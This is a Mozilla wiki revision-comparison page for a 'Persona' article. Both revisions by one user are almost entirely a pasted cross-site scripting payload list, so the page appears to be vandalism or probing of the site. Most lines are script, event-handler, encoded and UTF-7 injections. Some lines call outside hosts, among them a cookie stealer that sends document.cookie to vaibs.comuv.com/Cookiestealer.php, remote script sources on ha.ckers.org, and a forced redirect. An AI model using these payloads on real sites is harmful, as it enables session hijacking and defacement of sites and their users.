mozilla

Compare Revisions

Persona

Change Revisions

Revision 320027:

Revision 320027 by Vaibs on

Revision 320029:

Revision 320029 by Vaibs on

Title:
Persona
Persona
Slug:
Persona
Persona
Content:

Revision 320027
Revision 320029
n4 n
5    <script type="text/javascript">
6ALeRt("hi");
7    </script>
t11    &lt;script&gt;alert(1)&lt;/script&gt; <font style="color:exprt
>ession(alert(1))">abc</font> “&gt;<script type="text/javascript"> 
12alert(document.cookie)
13    </script>“&gt;<script type="text/javascript">
14alert(" XSSED by Vaibs")
15    </script>“&gt;<script type="text/javascript">
16prompt(1)
17    </script>“&gt;<script type="text/javascript">
18prompt(alert(document.cookie))
19    </script>ipt&gt;alert(document.cookie)ipt&gt; ipt&gt;prompt(a
>lert(document.cookie))ipt&gt; <script type="text/javascript"> 
20ALeRt("hi");
21    </script>%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%
>22%29%3b%3c%2f%73%63%72%69%70%74%3e '"&gt;<iframe src="//xssed.co 
>m">&amp;FromMail=&amp;Me '; alert(1); ' <a href="javascript:"></a 
>> 
22    <div>7    <p>
23      <a href='javascript:{%20alert(/"xss_attack/");%20otherxss()8      &amp;lt;script&amp;gt;alert(1)&amp;lt;/script&amp;gt;&nbsp;
>;}' onclick='alert(\"xss_attack\");' onhover='alert (\"xss_attack><br>
>\");' onmouseout="alert(\&quot;xss_attack\&quot;)" class='thiscla 
>ss'>link</a> style='width:expression(alert(\"xss_attack\")); %253 
>cscript%253ealert(document.cookie)%253c/script%253e “&gt;<s>alert 
>(document.cookie)</s> var i=0; for(i=0;i&lt;=5;i++){alert('Cross  
>Website Scripting');} “&gt;<script type="text/javascript"> 
24alert(document.cookie)9      onmouseover=alert("XSS")<br>
10      &lt;font style="color:expression(alert(1))"&gt;abc&lt;/font
 >&gt;<br>
11      //--&gt;&lt;/SCRIPT&gt;"&gt;'&gt;&lt;SCRIPT&gt;alert(String
 >.fromCharCode(88,83,83))&lt;/SCRIPT&gt;<br>
12      //";alert(String.fromCharCode(88,83,83))<br>
13      &nbsp; “&gt;&lt;script &gt;alert(document.cookie)&lt;/scrip
 >t&gt;<br>
14      &nbsp;&nbsp; “&gt;&lt;script &gt;prompt(alert(document.cook
 >ie))&lt;/script&gt;<br>
15      &nbsp; &lt;scr&lt;script&gt;ipt&gt;alert(document.cookie)&l
 >t;/scr&lt;/script&gt;ipt&gt;<br>
16      '"&gt;&lt;iframe src=//xssed.com&gt;&amp;FromMail=&amp;Me<b
 >r>
17      &nbsp; '"&gt;&lt;iframe src=alert(document.cookie)&gt;&amp;
 >FromMail=&amp;Me
18    </p>
19    <p>
20      '; alert(1); '<br>
21      &lt;a href=javascript: { {({}{}()())}alert('xss') ) ) }&gt;
 ><br>
22      &lt;div onload..;,;..'alert(\"xss_attack\");'&gt;<br>
23      &lt;a href='javascript:{ alert(\"xss_attack\"); otherxss();
 >}'<br>
24      onclick= 'alert(\"xss_attack\");' onhover='alert<br>
25      (\"xss_attack\");' onmouseout=alert(\"xss_attack\")<br>
26      class='thisclass'&gt; link&lt;/a&gt;<br>
27      style='width:expression(alert(\"xss_attack\"));<br>
28      %253cscript%253ealert(document.cookie)%253c/script%253e<br>
29      &nbsp; “&gt;&lt;s”%2b”cript&gt;alert(document.cookie)&lt;/s
 >cript&gt;<br>
30      var i=0; for(i=0;i&lt;=5;i++){alert('Cross Website Scriptin
 >g');}<br>
31      &nbsp; “&gt;&lt;ScRiPt&gt;alert(document.cookie)&lt;/script
 >&gt;<br>
25      </script> “&gt;&lt;&lt;script&gt;alert(document.cookie);//&32      &nbsp; “&gt;&lt;&lt;script&gt;alert(document.cookie);//&lt;
>lt;&lt;/script&gt; foo%00<script type="text/javascript">>&lt;/script&gt;<br>
26alert(document.cookie)33      foo%00&lt;script&gt;alert(document.cookie)&lt;/script&gt;<b
 >r>
27      </script> %22/%3E%3CBODY%20onload=’document.write(%22%3Cs%234      %22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cri
>2%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%>pt%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E<br>
>3E /*--&gt;]]&gt;%&gt;?&gt;'-/"/-alert(1)//&gt;<img src="1onerror 
>=alert(1)" alt="">' ‘; alert(document.cookie); var foo=’ foo\’; a 
>lert(document.cookie);//’; <script type="text/javascript"> 
28alert(document.cookie)35      &nbsp;&nbsp; /*--&gt;]]&gt;%&gt;?&gt;&lt;/object&gt;&lt;/sc
 >ript&gt;&lt;/title&gt;&lt;/textarea&gt;&lt;/noscript&gt;&lt;/styl
 >e&gt;&lt;/xmp&gt;'-/"/-alert(1)//&gt;&lt;img src=1onerror=alert(1
 >)&gt;'
29      </script> "&gt;36    </p>
30    </div></iframe>37    <p>
38      ‘; alert(document.cookie); var foo=’<br>
39      foo\’; alert(document.cookie);//’;<br>
40      &lt;/script&gt;&lt;script &gt;alert(document.cookie)&lt;/sc
 >ript&gt;<br>
41      "&gt;&lt;#$%&amp;/&gt;&lt;img src=asdf onerror=alert(docume
 >nt.cookie)&gt;<br>
42      &lt;BODY ONLOAD=alert(’XSS’)&gt;Other XSS that don’t requir
 >e &lt;script&gt;:<br>
43      &lt;BODY ONLOAD=alert(’XSS’)&gt;<br>
44      &lt;/textarea&gt;"&gt;&lt;#$%&amp;/&gt;&lt;script&gt;alert(
 >document.cookie)&lt;/script&gt;<br>
45      &lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&a
 >mp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp
 >;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#
 >x53&amp;#x53&amp;#x27&amp;#x29&gt;<br>
46      &lt;IMG SRC="jav ascript:alert('XSS');"&gt;<br>
47      &lt;IMG SRC="jav&amp;#x0D;ascript:alert('XSS');"&gt;<br>
48      &lt;IMG SRC=" &nbsp; javascript:alert('XSS'); "onclick="sta
 >rtGateway('NDcyNjMx');"&gt;<br>
49      &lt;iframe src=http://ha.ckers.org/scriptlet.html &lt;<br>
50      &lt;SCRIPT SRC=//ha.ckers.org/.j&gt;<br>
51      &lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert("XSS")&g
 >t;<br>
52      &lt;BODY BACKGROUND="javascript:alert('XSS')"&gt;<br>
53      &lt;BODY ONLOAD=alert('XSS')&gt;<br>
54      &lt;IMG DYNSRC="javascript:alert('XSS')"&gt;<br>
55      &lt;LAYER SRC="http://ha.ckers.org/scriptlet.html"&gt;&lt;/
 >LAYER&gt;<br>
56      &lt;/TITLE&gt;&lt;SCRIPT&gt;alert("XSS");&lt;/SCRIPT&gt;<br
 >>
57      &lt;INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"&gt;<b
 >r>
58      &lt;IMG LOWSRC="javascript:alert('XSS')"&gt;<br>
59      &lt;BR SIZE="&amp;{alert('XSS')}"&gt;<br>
60      <br>
61      &lt;LAYER SRC="http:&amp;lt;script&amp;gt;alert(1)&amp;lt;/
 >script&amp;gt; &nbsp;&nbsp; &nbsp;<br>
62      onmouseover=alert("XSS")<br>
63      &lt;font style="color:expression(alert(1))"&gt;abc&lt;/font
 >&gt;<br>
64      //--&gt;&lt;/SCRIPT&gt;"&gt;'&gt;&lt;SCRIPT&gt;alert(String
 >.fromCharCode(88,83,83))&lt;/SCRIPT&gt;<br>
65      //";alert(String.fromCharCode(88,83,83))<br>
66      &nbsp;&nbsp; &nbsp; “&gt;&lt;script &gt;alert(document.cook
 >ie)&lt;/script&gt;<br>
67      &nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp; “&gt;&lt;script &gt;
 >prompt(alert(document.cookie))&lt;/script&gt;<br>
68      &nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&lt;scr&lt;script&gt;
 >ipt&gt;alert(document.cookie)&lt;/scr&lt;/script&gt;ipt&gt;<br>
69      &nbsp;&nbsp; &nbsp;'"&gt;&lt;iframe src=//xssed.com&gt;&amp
 >;FromMail=&amp;Me<br>
70      &nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;'"&gt;&lt;iframe src=
 >alert(document.cookie)&gt;&amp;FromMail=&amp;Me<br>
71      <br>
72      '; alert(1); '<br>
73      &lt;a href=javascript: { {({}{}()())}alert('xss') ) ) }&gt;
 ><br>
74      &lt;div onload..;,;..'alert(\"xss_attack\");'&gt;<br>
75      &lt;a href='javascript:{ alert(\"xss_attack\"); otherxss();
 >}'<br>
76      &nbsp;onclick= 'alert(\"xss_attack\");' onhover='alert<br>
77      (\"xss_attack\");' onmouseout=alert(\"xss_attack\")<br>
78      class='thisclass'&gt; link&lt;/a&gt;<br>
79      style='width:expression(alert(\"xss_attack\"));<br>
80      &nbsp;&nbsp; &nbsp;%253cscript%253ealert(document.cookie)%2
 >53c/script%253e<br>
81      &nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;“&gt;&lt;s”%2b”cript&
 >gt;alert(document.cookie)&lt;/script&gt;<br>
82      &nbsp;&nbsp; &nbsp;var i=0; for(i=0;i&lt;=5;i++){alert('Cro
 >ss Website Scripting');}<br>
83      &nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;“&gt;&lt;ScRiPt&gt;al
 >ert(document.cookie)&lt;/script&gt;<br>
84      &nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;“&gt;&lt;&lt;script&g
 >t;alert(document.cookie);//&lt;&lt;/script&gt;<br>
85      &nbsp;&nbsp; &nbsp;foo%00&lt;script&gt;alert(document.cooki
 >e)&lt;/script&gt;<br>
86      &nbsp;&nbsp; &nbsp;%22/%3E%3CBODY%20onload=’document.write(
 >%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script
 >%3E%22)’%3E<br>
87      &nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;/*
 >--&gt;]]&gt;%&gt;?&gt;&lt;/object&gt;&lt;/script&gt;&lt;/title&gt
 >;&lt;/textarea&gt;&lt;/noscript&gt;&lt;/style&gt;&lt;/xmp&gt;'-/"
 >/-alert(1)//&gt;&lt;img src=1onerror=alert(1)&gt;'<br>
88      <br>
89      &nbsp;&nbsp; &nbsp;‘; alert(document.cookie); var foo=’<br>
90      &nbsp;&nbsp; &nbsp;foo\’; alert(document.cookie);//’;<br>
91      &nbsp;&nbsp; &nbsp;&lt;/script&gt;&lt;script &gt;alert(docu
 >ment.cookie)&lt;/script&gt;<br>
92      &nbsp;&nbsp; &nbsp;"&gt;&lt;#$%&amp;/&gt;&lt;img src=asdf o
 >nerror=alert(document.cookie)&gt;<br>
93      &nbsp;&nbsp; &nbsp;&lt;BODY ONLOAD=alert(’XSS’)&gt;Other XS
 >S that don’t require &lt;script&gt;:&nbsp;&nbsp; &nbsp;<br>
94      &nbsp;&nbsp; &nbsp;&lt;BODY ONLOAD=alert(’XSS’)&gt;<br>
95      &lt;/textarea&gt;"&gt;&lt;#$%&amp;/&gt;&lt;script&gt;alert(
 >document.cookie)&lt;/script&gt;<br>
96      &nbsp;&nbsp; &nbsp;&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&
 >amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&am
 >p;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;
 >#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;<br>
97      &nbsp;&nbsp; &nbsp;&lt;IMG SRC="jav&nbsp;&nbsp; &nbsp;ascri
 >pt:alert('XSS');"&gt;<br>
98      &nbsp;&nbsp; &nbsp;&lt;IMG SRC="jav&amp;#x0D;ascript:alert(
 >'XSS');"&gt;<br>
99      &nbsp;&nbsp; &nbsp;&lt;IMG SRC=" &nbsp; javascript:alert('X
 >SS'); "onclick="startGateway('NDcyNjMx');"&gt;<br>
100      &nbsp;&nbsp; &nbsp;&lt;iframe src=http://ha.ckers.org/scrip
 >tlet.html &lt;<br>
101      &nbsp;&nbsp; &nbsp;&lt;SCRIPT SRC=//ha.ckers.org/.j&gt;<br>
102      &nbsp;&nbsp; &nbsp;&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|
 >\]^`=alert("XSS")&gt;<br>
103      &nbsp;&nbsp; &nbsp;&lt;BODY BACKGROUND="javascript:alert('X
 >SS')"&gt;<br>
104      &nbsp;&nbsp; &nbsp;&lt;BODY ONLOAD=alert('XSS')&gt;<br>
105      &nbsp;&nbsp; &nbsp;&lt;IMG DYNSRC="javascript:alert('XSS')"
 >&gt;<br>
106      &nbsp;&nbsp; &nbsp;&lt;LAYER SRC="http://ha.ckers.org/scrip
 >tlet.html"&gt;&lt;/LAYER&gt;<br>
107      &nbsp;&nbsp; &nbsp;&lt;/TITLE&gt;&lt;SCRIPT&gt;alert("XSS")
 >;&lt;/SCRIPT&gt;<br>
108      &nbsp;&nbsp; &nbsp;&lt;INPUT TYPE="IMAGE" SRC="javascript:a
 >lert('XSS');"&gt;<br>
109      &nbsp;&nbsp; &nbsp;&lt;IMG LOWSRC="javascript:alert('XSS')"
 >&gt;<br>
110      &nbsp;&nbsp; &nbsp;&lt;BR SIZE="&amp;{alert('XSS')}"&gt;<br
 >>
111      &nbsp;&nbsp; &nbsp;<br>
112      &nbsp;&nbsp; &nbsp;&lt;LAYER SRC="http://ha.ckers.org/scrip
 >tlet.html"&gt;&lt;/LAYER&gt;<br>
113      &nbsp;&nbsp; &nbsp;&lt;LINK REL="stylesheet" HREF="http://h
 >a.ckers.org/xss.css"&gt;<br>
114      &nbsp;&nbsp; &nbsp;Pic pop "&gt;&lt;script&gt;location="htt
 >p://vaibs.comuv.com/MS.jpg";&lt;/script&gt;<br>
115      &nbsp;&nbsp; &nbsp;steal cookie "&gt;&lt;Script&gt;document
 >.location = 'http://vaibs.comuv.com/Cookiestealer.php?cookie=' + 
 >document.cookie; &lt;/Script&gt;<br>
116      &nbsp;&nbsp; &nbsp; redirect &lt;meta http-equiv="refresh" 
 >content="0;url=http://www.facebook.com/vaibstechboy" /&gt;<br>
117      &nbsp;&nbsp; &nbsp; &lt;script&gt;alert("1337`")&lt;/script
 >&gt; &lt;BODY ONLOAD=alert(document.cookie)&gt;"&gt;&lt;script&gt
 >;alert(1337`);&lt;/script&gt; &lt;script&gt;window.document.write
 >("&lt;input type='file'&gt;");&lt;/script&gt; &lt;a rel='nofollow
 >' href='search?searchterm=&lt;b&gt;war10rd made you click on link
 >&lt;/b&gt;'&gt;war10rd`&lt;/a&gt;<br>
118      &nbsp;&nbsp; &nbsp; '+alert(1)+' &nbsp;&nbsp; &nbsp;<br>
119      &nbsp;&nbsp; &nbsp; +ADw-script+AD4-alert(/xss/)+ADsAPA-/sc
 >ript+AD4-<br>
120      &nbsp;&nbsp; &nbsp; +ADw-script+AD4-document.write(String.f
 >romCharCode(60,105,109,103,32,115,114,99,61,104,116,116,112,58,47
 >,47,115,105,116,101,119,97,116,99,104,47,113,97,47,99,111,111,107
 >,105,101,46,112,104,112,47).concat(document.cookie).concat(String
 >.fromCharCode(20,47,62)))+ADsAPA-/script+AD4-<br>
121      &nbsp;&nbsp; &nbsp; &nbsp;&nbsp; &nbsp;+}&lt;%2Fstyle&gt;&l
 >t;script&gt;a%3Deval%3Bb%3Dalert%3Ba(b(%2FXSS%2F.source))%3B&lt;%
 >2Fscript&gt;&lt;MARQUEE+BGCOLOR%3D"RED"&gt;&lt;H1&gt;XSS3d+by+haR
 >I(topsecure.net)&lt;%2FH1&gt;&lt;%2FMARQUEE&gt;<br>
122      &nbsp;&nbsp; &nbsp;<br>
123      &nbsp;&nbsp; &nbsp;<br>
124      //ha.ckers.org/scriptlet.html"&gt;&lt;/LAYER&gt;<br>
125      &lt;LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css
 >"&gt;<br>
126      Pic pop "&gt;&lt;script&gt;location="http://vaibs.comuv.com
 >/MS.jpg";&lt;/script&gt;<br>
127      steal cookie "&gt;&lt;Script&gt;bbbvvvdocument.location = '
 >http://vaibs.comuv.com/Cookiestealer.php?cookie=' + document.cook
 >ie; &lt;/Script&gt;<br>
128      &nbsp; redirect &lt;meta http-equiv="refresh" content="0;ur
 >l=http://www.facebook.com/vaibstechboy" /&gt;<br>
129      &nbsp; &lt;script&gt;alert("1337`")&lt;/script&gt; &lt;BODY
 > ONLOAD=alert(document.cookie)&gt;"&gt;&lt;script&gt;alert(1337`)
 >;&lt;/script&gt; &lt;script&gt;window.document.write("&lt;input t
 >ype='file'&gt;");&lt;/script&gt; &lt;a rel='nofollow' href='searc
 >h?searchterm=&lt;b&gt;war10rd mbade you click on link&lt;/b&gt;'&
 >gt;war10rd`&lt;/a&gt;<br>
130      &nbsp; '+alert(1)+'&nbsp;<br>
131      &nbsp; +ADw-script+AD4-alert(/xss/)+ADsAPA-/script+AD4-<br>
132      &nbsp; +ADw-script+AD4-document.write(String.fromCharCode(6
 >0,105,109,103,32,115,114,99,61,104,116,116,112,58,47,47,115,105,1
 >16,101,119,97,116,99,104,47,113,97,47,99,111,111,107,105,101,46,1
 >12,104,112,47).concat(document.cookie).concat(String.fromCharCode
 >(20,47,62)))+ADsAPA-/script+AD4-<br>
133      &nbsp;&nbsp; +}&lt;%2Fstyle&gt;&lt;script&gt;a%3Deval%3Bb%3
 >Dalert%3Ba(b(%2FXSS%2F.source))%3B&lt;%2Fscript&gt;&lt;MARQUEE+BG
 >COLOR%3D"RED"&gt;&lt;H1&gt;XSS3d+by+haRI(topsecure.net)&lt;%2FH1&
 >gt;&lt;%2FMARQUEE&gt;<br>
134      &nbsp;<br>
135      &nbsp;<code>b</code>
136    </p>

Back to History